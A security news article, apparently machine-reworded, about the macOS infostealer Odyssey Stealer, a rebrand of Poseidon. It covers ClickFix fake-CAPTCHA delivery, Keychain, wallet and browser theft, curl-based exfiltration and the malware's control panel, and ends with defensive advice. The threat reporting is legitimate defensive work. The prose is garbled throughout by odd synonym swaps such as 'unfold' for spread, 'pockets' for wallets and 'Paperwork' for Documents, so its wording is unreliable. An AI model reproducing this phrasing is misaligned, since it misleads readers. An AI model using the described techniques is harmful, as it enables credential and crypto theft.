The macOS-targeting Poseidon Stealer is believed to have been rebranded as Odyssey Stealer, CYFIRMA reported Thursday.The Poseidon malware-as-a-service (MaaS) was beforehand unfold by Google Advertisements in a malvertising marketing campaign reported by Malwarebytes in June 2024.Now, Odyssey Stealer, attributed to Poseidon creator and AMOS Stealer co-author “Rodrigo,” is being distributed through ClickFix campaigns on spoofed finance, cryptocurrency information and Apple App Retailer web sites, based on CYFIRMA.The ClickFix technique leverages pretend Cloudflare CAPTCHA prompts that instruct customers to repeat and paste a Base64-encoded command into the Mac Terminal to show they aren’t a robotic. This command fetches an osascript command that executes the malicious Odyssey AppleScript.Upon execution, Odyssey shows a immediate requesting the consumer’s machine password in an try to assist retrieve decrypted credentials from the Keychain service.The infostealer targets Keychain, cryptocurrency pockets purposes like Electrum, Coinomi and Exodus, and browsers together with Safari, Chrome and Firefox.Pilfered browser information contains saved passwords and fee data, shopping historical past, autofill information, particulars from cryptocurrency and authentication-related plugins, and browser session cookies that can be utilized to hijack account periods.Odyssey additionally snatches information from the Desktop and Paperwork folder which have the next extensions: .txt, .pdf, .docx, .jpg, .png, .rtf and .kdbx.Stolen information is copied to short-term listing created by the malware known as /tmp/lovemrtrump and compressed into an archive known as out.zip earlier than exfiltration. The archive is then despatched to the attacker’s server through a curl POST request with as much as 10 further requests made each 60 seconds if the preliminary add fails.The stolen information is shipped with headers that assist the attacker observe their victims by username and cid, in addition to malware buildid.CYFIRMA uncovered particulars in regards to the Odyssey Stealer management panel, which permits customers to view and handle their contaminated gadgets, stolen information logs and customized malware variations. The panel features a “Google Cookies Restore” part for hijacking browser periods utilizing stolen cookies, a “Visitor Mode” for potential patrons of the Odyssey MaaS to trial some options, and a dashboard for viewing assault statistics.A lot of the Odyssey Stealer panels found by CYFIRMA had been famous to be based mostly in Russia.Odyssey Stealer and Poseidon Staler each share origins with AMOS Stealer, often known as Atomic Stealer, which is run as a separate macOS MaaS operation by a menace actor generally known as “ping3r.” AMOS Stealer was famous to be unfold utilizing the ClickFix technique in one other marketing campaign reported earlier this month, highlighting the social engineering technique’s rising reputation.The creation of Odyssey Stealer was additionally attributed to Rodrigo by Moonlock Lab, who discovered the infostealer being distributed by pretend Ledger Reside apps final month.CYFIRMA printed indicators of compromise (IoCs) for the newest marketing campaign and recommends organizations take measures to defend in opposition to Odyssey and related malware by blocking osascript execution except needed for enterprise operations, using software whitelisting, utilizing real-time and behavior-based monitoring to detect and reply to intrusions and block outbound communication to identified malicious IP addresses and domains.Mac customers are additionally suggested to concentrate on websites impersonating app shops and solely set up purposes from the official Mac App Retailer or verified developer websites.
